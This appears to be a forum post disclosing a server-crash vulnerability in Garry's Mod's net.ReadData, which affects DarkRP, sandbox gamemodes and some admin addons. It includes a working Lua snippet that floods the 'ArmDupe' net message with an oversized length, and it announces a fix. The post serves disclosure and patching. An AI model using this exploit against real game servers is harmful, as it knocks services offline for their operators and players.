net.ReadData Crash Exploit
This issue currently affects any sandbox derived gamemode including DarkRP and any addon which utilizes net.ReadData which includes a number of ScreenGrab and admin addons.
When you pass an abnormally high length value to net.ReadData you will cause the server to crash without any error message saved in the logs.
In some cases you will need to do it several times for the crash to occur, many exploiters are simply sending the vulnerable net message using a loop to ensure the server crashes.
Example exploit code
This code will for example crash any sandbox derived gamemode including DarkRP. You can easily change the net message to the name of another vulnerable addon
local function SandboxCrash() for i = 1, 100 do net.Start( "ArmDupe" ) net.WriteUInt( 99999999999999, 32 ) net.WriteData(" ",99999999999999) net.SendToServer() end end concommand.Add("sandbox_crash", SandboxCrash)
I have created a fix which will stop exploiters from crashing any servers running a vulnerable gamemode or addon. Simply download, unzip and drag and drop into addons:
Robotboy/Willox: Please take a look at the issue with net.ReadData so hopefully we can get this patched for the next update. Thank you!